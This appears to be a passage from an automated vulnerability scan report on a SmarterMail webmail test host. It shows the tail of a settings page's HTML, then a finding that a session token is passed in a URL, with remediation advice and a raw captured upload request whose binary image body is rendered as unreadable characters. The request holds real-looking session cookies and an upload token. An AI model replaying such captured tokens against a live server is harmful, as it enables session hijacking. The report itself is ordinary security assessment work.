                   <td id="ctl00_MPH_wucUserSettings_chkBlockImages_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkBlockImages_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkBlockImages_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkBlockImages_SettingCheck" checked="checked" /><label for="ctl00_MPH_wucUserSettings_chkBlockImages_SettingCheck">Disable automatic image loading in preview pane</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkAutoPopupReminders">
                   <td id="ctl00_MPH_wucUserSettings_chkAutoPopupReminders_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkAutoPopupReminders_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkAutoPopupReminders_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkAutoPopupReminders_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkAutoPopupReminders_SettingCheck">Enable automatic reminder popup</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkDisableReminders">
                   <td id="ctl00_MPH_wucUserSettings_chkDisableReminders_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkDisableReminders_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkDisableReminders_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkDisableReminders_SettingCheck" checked="checked" /><label for="ctl00_MPH_wucUserSettings_chkDisableReminders_SettingCheck">Disable reminders for appointments and tasks</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkEnableAnimations">
                   <td id="ctl00_MPH_wucUserSettings_chkEnableAnimations_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkEnableAnimations_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkEnableAnimations_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkEnableAnimations_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkEnableAnimations_SettingCheck">Enable animations</label></td>
               </tr>
           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvComposeSettings' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvComposeSettings">
       <table class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_wucUserSettings_ddComposeAs">
                   <td id="ctl00_MPH_wucUserSettings_ddComposeAs_Label" class="Indent Fixed">Compose Format</td><td id="ctl00_MPH_wucUserSettings_ddComposeAs_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddComposeAs_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddComposeAs_SettingDropDown">
                       <option selected="selected" value="html">HTML</option>
                       <option value="plain">Text</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddComposeFont">
                   <td id="ctl00_MPH_wucUserSettings_ddComposeFont_Label" class="Indent Fixed">Compose Font</td><td id="ctl00_MPH_wucUserSettings_ddComposeFont_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddComposeFont_SettingDropDown1" id="ctl00_MPH_wucUserSettings_ddComposeFont_SettingDropDown1">
                       <option selected="selected" value="Arial, Helvetica, sans-serif">Arial</option>
                       <option value="Courier New, monospace">Courier</option>
                       <option value="Georgia, serif">Georgia</option>
                       <option value="Lucida Sans Unicode, Lucida Grande, sans-serif">Lucida</option>
                       <option value="Lucida Console, Monaco, monospace">Lucida Console</option>
                       <option value="Palatino Linotype, Book Antiqua, Palatino, serif">Palatino</option>
                       <option value="Tahoma, Geneva, sans-serif">Tahoma</option>
                       <option value="Times New Roman, Times, serif">Times</option>
                       <option value="Trebuchet MS, sans-serif">Trebuchet</option>
                       <option value="Verdana, Arial, Helvetica, sans-serif">Verdana</option>

                   </select> <select name="ctl00$MPH$wucUserSettings$ddComposeFont_SettingDropDown2" id="ctl00_MPH_wucUserSettings_ddComposeFont_SettingDropDown2">
                       <option value="8pt">8pt</option>
                       <option value="9pt">9pt</option>
                       <option selected="selected" value="10pt">10pt</option>
                       <option value="12pt">12pt</option>
                       <option value="14pt">14pt</option>
                       <option value="16pt">16pt</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddTextEncoding">
                   <td id="ctl00_MPH_wucUserSettings_ddTextEncoding_Label" class="Indent Fixed">Text Encoding</td><td id="ctl00_MPH_wucUserSettings_ddTextEncoding_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddTextEncoding_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddTextEncoding_SettingDropDown">
                       <option value="28596">Arabic (ISO)</option>
                       <option value="1256">Arabic (Windows)</option>
                       <option value="28594">Baltic (ISO)</option>
                       <option value="1257">Baltic (Windows)</option>
                       <option value="28592">Central European (ISO)</option>
                       <option value="1250">Central European (Windows)</option>
                       <option value="54936">Chinese Simplified (GB18030)</option>
                       <option value="936">Chinese Simplified (GB2312)</option>
                       <option value="52936">Chinese Simplified (HZ)</option>
                       <option value="950">Chinese Traditional (Big5)</option>
                       <option value="28595">Cyrillic (ISO)</option>
                       <option value="20866">Cyrillic (KOI8-R)</option>
                       <option value="21866">Cyrillic (KOI8-U)</option>
                       <option value="1251">Cyrillic (Windows)</option>
                       <option value="28597">Greek (ISO)</option>
                       <option value="1253">Greek (Windows)</option>
                       <option value="1255">Hebrew (Windows)</option>
                       <option value="38598">Hewbrew (ISO-Logical)</option>
                       <option value="50220">Japanese (JIS)</option>
                       <option value="50221">Japanese (JIS-Allow 1 byte Kana)</option>
                       <option value="932">Japanese (Shift-JIS)</option>
                       <option value="949">Korean</option>
                       <option value="51949">Korean (EUC)</option>
                       <option value="50225">Korean (ISO)</option>
                       <option value="28593">Latin 3 (ISO)</option>
                       <option value="28605">Latin 9 (ISO)</option>
                       <option value="874">Thai (Windows)</option>
                       <option value="28599">Turkish (ISO)</option>
                       <option value="1254">Turkish (Windows)</option>
                       <option value="65000">Unicode (UTF-7)</option>
                       <option value="65001">Unicode (UTF-8)</option>
                       <option value="20127">US-ASCII</option>
                       <option value="1258">Vietnamese (Windows)</option>
                       <option selected="selected" value="28591">Western European (ISO) (default)</option>
                       <option value="1252">Western European (Windows)</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddSpellCheckDictionary">
                   <td id="ctl00_MPH_wucUserSettings_ddSpellCheckDictionary_Label" class="Indent Fixed">Spell Check Dictionary</td><td id="ctl00_MPH_wucUserSettings_ddSpellCheckDictionary_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddSpellCheckDictionary_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddSpellCheckDictionary_SettingDropDown">
                       <option selected="selected" value="">Attempt to use language from login</option>
                       <option value="en-US">English (United States)</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddForwardingMethod">
                   <td id="ctl00_MPH_wucUserSettings_ddForwardingMethod_Label" class="Indent Fixed">Forwarding Method</td><td id="ctl00_MPH_wucUserSettings_ddForwardingMethod_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddForwardingMethod_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddForwardingMethod_SettingDropDown">
                       <option selected="selected" value="normal">Normal</option>
                       <option value="plain">Text</option>
                       <option value="attachment">Embed as Attachment</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddAutoSaveDraft">
                   <td id="ctl00_MPH_wucUserSettings_ddAutoSaveDraft_Label" class="Indent Fixed">Auto Save Frequency</td><td id="ctl00_MPH_wucUserSettings_ddAutoSaveDraft_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddAutoSaveDraft_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddAutoSaveDraft_SettingDropDown">
                       <option value="0">None</option>
                       <option value="60000">1 Minute</option>
                       <option selected="selected" value="120000">2 Minutes</option>
                       <option value="180000">3 Minutes</option>
                       <option value="300000">5 Minutes</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddReplyHeaderType">
                   <td id="ctl00_MPH_wucUserSettings_ddReplyHeaderType_Label" class="Indent Fixed">Reply Header Type</td><td id="ctl00_MPH_wucUserSettings_ddReplyHeaderType_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddReplyHeaderType_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddReplyHeaderType_SettingDropDown">
                       <option selected="selected" value="Basic">Basic</option>
                       <option value="Full">Full</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_txtReplyIndicator">
                   <td id="ctl00_MPH_wucUserSettings_txtReplyIndicator_Label" class="Indent Fixed">Reply Text Indicator</td><td id="ctl00_MPH_wucUserSettings_txtReplyIndicator_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtReplyIndicator_SettingText" type="text" value=">" size="4" id="ctl00_MPH_wucUserSettings_txtReplyIndicator_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkEmbedReplies">
                   <td id="ctl00_MPH_wucUserSettings_chkEmbedReplies_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkEmbedReplies_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkEmbedReplies_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkEmbedReplies_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkEmbedReplies_SettingCheck">Enable inclusion of previous replies in reply</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkSaveSentItems">
                   <td id="ctl00_MPH_wucUserSettings_chkSaveSentItems_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkSaveSentItems_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkSaveSentItems_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkSaveSentItems_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkSaveSentItems_SettingCheck">Enable sent items folder</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkRequestReceipt">
                   <td id="ctl00_MPH_wucUserSettings_chkRequestReceipt_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkRequestReceipt_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkRequestReceipt_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkRequestReceipt_SettingCheck" checked="checked" /><label for="ctl00_MPH_wucUserSettings_chkRequestReceipt_SettingCheck">Enable read receipts by default</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkAutoTrust">
                   <td id="ctl00_MPH_wucUserSettings_chkAutoTrust_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkAutoTrust_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkAutoTrust_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkAutoTrust_SettingCheck" checked="checked" /><label for="ctl00_MPH_wucUserSettings_chkAutoTrust_SettingCheck">Enable trusted sender for webmail recipients</label></td>
               </tr>
           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvUserGroups' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvUserGroups">
       <table id="ctl00_MPH_wucUserSettings_tblUserGroups" class="SettingsContainer SCMarginTop" border="0">

           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvThrottling' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvThrottling">
       <table class="SettingsContainer SCMarginTop" border="0">

           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvServicePermissions' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvServicePermissions">
       <table id="ctl00_MPH_wucUserSettings_ServicePermissionsContainer" class="SettingsContainer SCMarginTop" border="0">

           </table>
   </span></div>
       
</div>
   

       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/frmmysettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmMySettings\x2easpx?'); });
$('#ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_SettingText').val('');
$('#ctl00_MPH_wucUserSettings_txtNP_SettingText').val('');
$('#ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_SettingText').val('');
Sys.Application.initialize();
$(function() { SetTopTitle('Account\x20Settings\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
$(function() { $('#ctl00_TPH_TabStrip').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_wucUserSettings_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_TabStrip_tabUser":"ctl00_MPH_wucUserSettings_pvUserInformation","ctl00_TPH_TabStrip_tabDisplay":"ctl00_MPH_wucUserSettings_pvDisplaySettings","ctl00_TPH_TabStrip_tabCompose":"ctl00_MPH_wucUserSettings_pvComposeSettings","ctl00_TPH_TabStrip_tabForward":"ctl00_MPH_wucUserSettings_pvForwarding","ctl00_TPH_TabStrip_tabPlusAddress":"ctl00_MPH_wucUserSettings_pvPlusAddressing"},"ClientCallbacks":{}}); });
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm Password","vcID":"ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_SettingText","VMs":["vmMustMatch"],"VPs":{"vmRequired":false,"vmMustMatch":"New Password","vmMustMatchField":"ctl00_MPH_wucUserSettings_txtNP_SettingText"}},false);});
modules['vmOptional_txt']='Value is optional';
$(function() {$vc({"lt":"Display Name","vcID":"ctl00_MPH_wucUserSettings_txtDisplayName_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Reply-To Email Address","vcID":"ctl00_MPH_wucUserSettings_txtReplyToAddress_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Forwarding Address","vcID":"ctl00_MPH_wucUserSettings_txtForwardingAddress_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Reply Text Indicator","vcID":"ctl00_MPH_wucUserSettings_txtReplyIndicator_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


4. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vulnerable.smartermail.site:9998
Path:   /FileStorageUpload.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

POST /FileStorageUpload.ashx?uploadValidationToken=9d943e1a12214d278f3862d35a06fa77&pathField=Root+Folder%5c&userField=testit&domainField=hoytllc.com&name=vulntyps.png&chunk=0&chunks=1&offset=0&file_size=48032 HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf
content-type: application/octet-stream
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserStorage"}; STTTState=
Content-Length: 48032

.PNG
.
...IHDR.....................sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....IDATx^...tUe..m..3:.8....(*Uz/R....+ "=.$@....$...%.zS.1..M..
!.D....3....{.x.Y.....=.>.9y.>.<...sr...N?g.+a...s..s.e........P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(.......P.
@.(...]..w..8...z}....6...X.n.}^r.....    ^.......P.
@.(......;.C.i... .....~.=...e.k..._........y....^o......n.N.W../....m.i.of.@........}...~~...{.Y...{
$]..o.3.v.......P.
@.(.......d....[k.J..>.!.D*...>...z...^o.]....    ....tBb...^f.ov...#.....Y.t~.%...~Yg.u...>z....~...J........P.
@.`.P.|........\Zq. T~.v?.v.6e..C!.....,z.....L.......1.>.....9..=.} ...O........:...9.:.k....$........O....j..o.|.Q.S.G...H{=...87..8Q.O.l..    ..._#.Q......?)^.......P.
@.7
..y.]w...g..EM..(`.......Fz.......Q.;.(.H.].....V.{c4..l|.......m.m.z......mirDE..s........%.\|.....n...C......b.e...&    ...w%.....N0..
...[......~..P.
@.(...........V.........)......    ....+...X...=...8J......~..l'E~.9..?..4.........>YN.....M."+..'.........../NJ.......I..7M.._.@._?.....4..E.o8<....tb......A.(.......P.
H
X..Q$....N.......'..M.".....S._K`..x.....w....FD.o.H.7;nr...*.C.".....d..D.._.....W.|=.Dp..MP.|.g...>P......=I3;9q.Mx>...P.
@.(......!.|.P..Dt.x....:...>.,.cu......O<......'..'Kh.|..r^^{...k.....o.\Etd._..._.J..{#:.Hk..x..-u.&.%.#k%.{q.#.El...&........P.
@.(....].....1.....C.w$.p...2Z.."..7JRD8........KzO..f...S.V..X.v@.b.....3.|...=&c2M....E&..uM...Y.&[=."o.v...?.}.6..h...+~v.33.}.m.?;.[.....Cv...i.i.C.......P.
@.(.........Y.Pl..!V....V.j..l.e.c).g.....f.........G ?S.}..=..(.......P.
@.(.......P.
@.(........
,....Mw.u-...P.
@.(.......P .....S.....8.......P.
@.(.........u...QP    
@.(.......P.
@..Q.7.n...R.l.6.
@.(.......P.
@.;.8.gQA%(.......P.
@.(...@...........`......P.
@.(......3..s...@.`.]..z.~.......7..IICx......\.....=o5~..}y ...@.(.......P.
@..V........R..$...}..7....'..1jT.[...m.0..u.z........Z..5.Z.....7k..5m....
~.....b..k.....m....r...g....a..da.m.~rA'.W...;.......P.
@.(....X...-|..O..o&H.$5..{....1b../.PD...g.......l.
.4a......}.O-......{.\K.mc.......g.e.>..I    .Z.O.V...u..`c..?.I....~....E....J'.%u...>.....
@.(.......P ~...{-......q..........]....e.Z.%...?. [..]T>..W pO..j.......V.++.j....5........-.`.........-....=\s.....>..+.=..P.
@.(...@.*...J..!W~;w.....kE...
[.`....../l.....Z.....'.Wq...=..`O.2...%.}.>..T.;s.d..i...{#.x.......=..../.....<...mCu..ZtY......{.....D.V...cK....+.l(.......P.G....Q.f......3&q..Ol......;.......}..w.z.d...{..@..pDs....|....x...=.................na...|.@q.....?....s..,..0....o..Y|.i.1~yt.e..q~.S._....^4........    X..^.......p........>..m...._..).......G.4.c..t[..B.]*...9.30.....{.?gz.a....n.....P.
@.(. ..P.!..y}....^..,k...".KYp........    ....@..>.9F.'._....=.[....7.r&...........nd.........[z.){..~...(......
......E.....E...........<..O....t.@.e..s....h.e=...g.'..=*...s....{..M...-.oqrd....|....j...|.........{..s.gq...^....I..<....D1..?a......P.
.L......7.f...}.....;W.j......w.].
...0.C...]._..6.s..pO.    ... ..?.O....]..s.......g..S{.
..7.o....&i..^2..}.........M..P......
......7.../.....z.y.=.R@..q...}..o:.o4L.1.....N..>.}e....t.@.+k"N...K{..>tI...-..M...s...0.K........?..~...9..|{.._y.=...P.
@..U.C}#..|.'....b.u.p..7....z........=.t.&..9...{..c55.m4..~...}zV...G...{...r..0.`...o..?.^.nG..C.....?E{v_@.....ug..\s.?...7:.^.'....|.|.l5.4:.N..9.C.+....N0}....X...b..}........'........F..O....@K.n.6.oR..&t[.........*......o.>...L....}.C.(......-....."...MQ..y.eP.
@.(..B......!...    #6...})..,.#*    ....^\...7i...h..=....V~.s....Es..{#...$....c...P{xu...m....Wk......J..v.*    ...6z...}-#o.-.o.d2.    .?......._?...).j...g.}. o.|....2}.a....S..o44...!t................Nv........._........./U....t.hI..lq.F...`.F*...@.(......w.h.9.o......(l....|.M..z*#......}=Ds...7...45G..*...i.S.rcm...@...u.i..lo.....-v.{...S..6........9.FZ=zbl`.m..d....~..D.:...A:..!.o.s+G........}....N...ID.>C@.8.0..;.../..<'b..&V....[...{.(.........O..8....l.........P .. ..S>.f..O...N.<......=9.n.?..9..ky.iwv.S....^k..s.t)b9....{..?...U...S^..."..=.......B.....9.R.F.t...t.....|..h...4.[r..E....=S\|.X...o.Ej....#...$.....K.)...M.r.H.";.........1.|.~2..fE>    2......g.3.#...=....~.U....:".s.....P ,
P.,Md..N.#..Z.'.....\...._......yj........    ...M.*......W.{..........Fvp.=.%o.H..........b......."h.]w...(...j.....u1..q.r.H..z..3n.0..).O.!.X>......6...N..&\s...M...1.....z.....) \|s".V.pi4.J.....i...g.cL=cE...f...^NM..k.o...7.....xL{.~.......(.......aU...G.n.w.....m...<..!..et....,l.fA+.....N...).W..;..2...{9w/;.t....p.+.C.^..]......c.;o.noj{Z. ..p..<V..Nc2....~.2...5f............q..Hh.j..d(........(@+..LJ...g..[.....)...s.
.f..q..q..........^g?^p[..^s.%....E.].>[t3............<..-..
@.(.......P B
P....?...Q.R..v-..W...n=........).j}.k.    ....lA+.{O.?..T.....-f....cS..s/.9>....9..]....o.u...?.+.......5.....Z..(...;>.
@.(..........M..|...n.:...U.....`.
......Zo.^..Cc0....r....m.qo,.qo.B~.\......$._.#P.........T+b9n.^@..y..}....Kn.=.....y|'..;<.....K..?{.......P.
@.0+@...7l.g..a.
.z..l..2.......+...D.....*.{..<+...bVJM........s/.~..{.|Q....Knf........\.{..0.........P.
@.(..
..W.<x;5...n}..>..p...|L...k.....q....a{...$.?.po.Tk.....h.o.{....|O.\rK..W;o..;J.w.Xt..|ZK)Et....

@.(.......aT..#7?.ln>._?.....@.........OpO.j.n.v/.S...
..r..M....3......Zzk...].<.........r...    ...k....P.
@.(...@.)@`......|.e6..L.....W......#9V....t.c.........7L....c.....c9F..../g..x...F.....J..X...K..o........c..
@.(............1c.....Q..{#....#...h...O&?U.^.....HS..bV*.s..Zc.^.rd.....5..u......u....s.o.'...G.>.....P.
@.(...@|)@.=.....+..w....NO...@....'..X..c.T+..k.X....T.........t.TK.....Gb.....=A..{/.....B..........w\,.oz...m....c...
@.(.........w..vF..K_.W..-.#.^.{Ds<.1.#1.....nV..x.qj...t}}..l..n....W].6.M..p/.>A>..................0.W..B.(.......P ..8Z...s..[6&....f7eK..U..}...pEs.V.......W.w.....V...95G..M.:..oyco<.....\r4..i.2u.y.^.u.z.....+.7s...kN~..>/...lj.6..c....
@.(.......!T.....>mHbn.3#f..^.q.VI....w.X...=.9...#..........S..$w....h.5.....3...8.
.....X...D./r]..[.......P.
@.(..
.......'7.No.^L.......g....j.|L...h.A.j^..0.....4..s...O.Y..bV...M....%........./...llr....M..j...Rl5...P.
@.(......t...    #&..pq.....^@.............4..So,DsB?5G8...I......pO.o..Q...2....9.#1MV...k.s...Ec...C6p.._./.............<.
@.(............|..%Mg...5jv3....{...>.>.3...y|BK.g.7..9E</.q....V^.J...{..Y3.'..)...*.G....wo.{.{/.>...K.b%..+.~..n.?......(.......P.
X(.a...k_.>...O/....{..c2[....W.8.sM..hY.j.o.5.b..j.@.k...2.5..
.....!....5.W...^.j]...Y..M.u.{=..a..../....W+n.......*.....(.......P.
...b.eJ~..#g=..p/..e.......y/K]..zq.v,...\..r!.S..2..cj....v.ti..{....i.U......{qytI#v|..g..p....quX..@.(.....h.
...../...G_......./.....'Ofs.\....U.{DsB..!..........).;..t.....U...Rm..s.).#..t.....j........-V.=.`......P.
@..W.....6{....k.(...SM..\S..[-.~.pO...^.v!?..9....wO1.X.....d.S....F..`.j#...Fa....r.T+.{9.......r.....;.....:4.I.....@.(.......K.j.........U..'.........i...y.J..7..|Ds.'.C..........vpO...bV|J.M...fb.^>AGebN.r.....{...K<.%.c.o.x.....a....P.
@.(...@L*.....M..y%...H...V.y..c....=...@.......i....g,..Zo.^_.6.Ss.s.M.i..}6.....T.eM.*pO..e.......7o....X1y..FC.(.....h8
.....C7...p.=A..Y.....U.s.....{?./a.....k..-.B~[+..A4......;...%.h.'...3......j..y......w.Rm.M.v....:.E...jV......"...s...B.(.......1.....4I^.p.......    ._.......i..Z..=..n....).H.>..=9....$'?....k/......G..{.....jiQ+..v.....bV.y<G.p.fe51G..k..C4G.{.|..^.N.....?}./E.b.?<6.
@.(......_.(G\.=i..../
.>...........K..L..>.....>P.7k...h.A>..;..T}.....&.P.^v.e.>..j.=.....[5...{s.'..T....|jg..4u*~...3(.......P ....pN....f7.....{..Q..g.....p..!..zcajN.XL.sO..+......V.=...S.*.0.J..w.T..:..Tk.._.`/....}...V...k.>.........P.
@.(...O.]...=....#.HN..^....:.,.....|..G4.7.c.{.m.|;._...lO..J;....w.....7..7.....Pc...... ..2O._...o.K...'.......
@.(......Z.....*an.s...H.=A.K..c..O...c3    ....@...l..j.z4....-[....U.c1+..=..C..........T+Fb:Esd..B>...5....O..A.?j...0(...........7..............Fs..e..[..xa@..{.........M...k    ...t.........y..]..81.":n..k...T.jiA.0.f..T[....^r.5._.....5....{.^......{.......P .. .(~3...9....C...q...Lkv].........L..C.X.f$&M.Yd(j.5V<L..pO.o<..z..;4.W..H5..-fet..Q3..05.....ko.....Kx.......{4..bE...........P .. .X.a..........q/{..T..2..c.|#...W.4e+S.U    ....#.S..[......0.r......>r...r. ......9...r.......{+..@.u..wzM.E.b.h.=..P.
@..(.J....|.........s.O......O...<*.^....=./...g......    v....IV^.6.y..dk.X.u.....N.V...9..T..|.B...j}.j.y..h..T+...x..z....k..rV..:v......Y.B|2...P .
..}_....N.......n......=tV....[=..~..........n.#..?&...._...._<O..f...^K..5.......Or..V...RZ....Tq.    ...........g..xL&............7.X...~..h....W.u.R--h......T....z....Op..*]y5....../...}.?...P.
...:.....'...O.h...q.    .........PO.M.o|..}2.,.}R...5..n.........yV..<..;.......yOz........9..(.9....{...s._*..p......X....V..Z..on..._.........Y..,s....0.S^....J.A.=5..p/....q.o...oV....o..
@.(...\.+......'.............=.s.\.=F.,;.2.....    .V._8.b;...9...J....#1zn...,...m.>.....{...s..q. ...h.[..jy..p-.....I...&2...NV....m..|r.......\..[#f=.3pO.?*.1[............}=L...h...........+..6...J.vM....{g...{.....j...=.c..."...]....x.?.g.....yP.
@.(........k..s.2tj.X.......&p...3....<z......p.]....+.&2..9.2.k..o...K...|.........m^O.....+...;.i.}n].F{._.m.........0p..'^...?..'....NfB.o.W[n.........V".c.P+.r.s/_N.y....\m...9....iE!....!..z{@..{....~}4.~.Gd.cS.....=.t4..@~...*..E.].......P.
@.(Q@8......_.D.u1Fl.n{A...{AR.~....7...}.s.,..7..[.A..k@.}......}.o%....:|.....0:.2..'..}.._.Li.T~..|.....t.N.........Q....|Q...R..........    .G....K[....<>bt...>&....ZcS-5.....,w/...?..t.......'.h.q.....Xm.]r9.uS.=...[..TU..|....[......P.
@.(S.,.#....>}3 ......7....+.6.......'.FW^~.p.........^..tp.k........h....8E|.l#9......c........._    ..h..P+.....8..n.:.>..9....x..K.Z.U.Y.....f.71...)o.......$w_.....}.J~.W..?.....w.....B.(...@.+`.....Hyq...M..".o.........5.ZDJ..8.o.. k.d......r.F....=.^L.....q.o........|[...1;....pEt|N.|.a...B.p....^7.............w.)z.G-A>.9e.../..`..4.S....c..l...g.;w..u.f.ZZ.*L.Y....Y..ob.    .k.s....u..../......*....?..<(......<.|....M.2...........V..#.d.&[..E..x.i..j......?A.>I..d.7.z.........f.>..}.r...44k.5./.gY7.z.G..I'2..6.o....{....$....Op....................|.-..V....m....w.{..[..e..........~...........5.>~{...SQ.^T.-f.LS..HL.hL..'......G._L.    .0..@.(..bO..1.b..F?Z.......h..k..n.d:....f.k..^u..>/..th.=..4..S...
.7k..L........y.jW..S#;.rS......Y..){O..F.n../.3x.....a.f(V.%'_..c.R.ZS..s/...+V].....~...z...<.
@.(........h.....r..._..?zNc.[0....I..7..9.X..j..h.p..{f@...[...mS........Fsx.>*..r.R.jS.....{......F...-..bXqp...@.(..... .x..xlf.... ..[=|..
.q.............Y.|S.>......9...q.w...Or...bVZ,G!..P.>....l.....X+.}9.{.{Q...bg.n....s:..q(.......P .. ......].....|.../.Jk.....j.Y.(..........cow...{.X..........OuQ..>./.....O._%.Cp..I..7k`e}.Tk...!.....r....06..o1...Z..Z/...^s.yU...}.......Q....yP.
@.(......#3....6....{..=w.....g.l0p.2....M..Y.T,.....eA+..{.-O........o~.!...V-...hN.6....wX.6..{..?YLQ.>>s.u.....J..9.7.8...P.
@.(..
P\.J..UoL.3zN....sOp/*ea..U|l.........%...X..>c.<.>..9...v.........p....j...s..:~...Y..y.|.........[..)w/.9.......O....X..C..7w1p..&B.(.......N
